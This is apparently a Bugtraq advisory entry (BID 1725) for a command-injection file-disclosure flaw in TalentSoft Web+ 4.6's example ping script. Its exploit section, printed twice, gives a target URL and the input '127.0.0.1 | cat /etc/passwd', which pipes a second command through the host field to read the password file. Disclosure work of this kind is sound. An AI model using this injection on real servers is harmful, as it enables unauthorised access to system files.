Talentsoft Web+ Example Script File Disclosure Vulnerability
BID:1725
Info
Talentsoft Web+ Example Script File Disclosure Vulnerability
| Bugtraq ID: | 1725 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Sep 26 2000 12:00AM |
| Updated: | Sep 26 2000 12:00AM |
| Credit: | This vulnerability was reported to bugtraq by Delphis Consulting Internet Security Team (DCIST) in an advisory (DST2K0042) dated 26/09/2000. |
| Vulnerable: |
TalentSoft Web+ Application Server (Linux) 4.6 |
| Not Vulnerable: | |
Exploit / POC
Talentsoft Web+ Example Script File Disclosure Vulnerability
Excerpted from the Delphis Security TeamCIST advisory (DST2K0042):
To exploit simply place a '|' after the parameter you which to provide to
ping and then the command you wish to execute.
e.g:
Goto:
http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
Then type in host destination box:
127.0.0.1 | cat /etc/passwd
You will then be presented with the contents of the /etc/passwd file.
Excerpted from the Delphis Security TeamCIST advisory (DST2K0042):
To exploit simply place a '|' after the parameter you which to provide to
ping and then the command you wish to execute.
e.g:
Goto:
http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
Then type in host destination box:
127.0.0.1 | cat /etc/passwd
You will then be presented with the contents of the /etc/passwd file.
References
Talentsoft Web+ Example Script File Disclosure Vulnerability
References:
References:
- How to disable webrun (TalentSoft)
- TalentSoft Homepage (TalentSoft)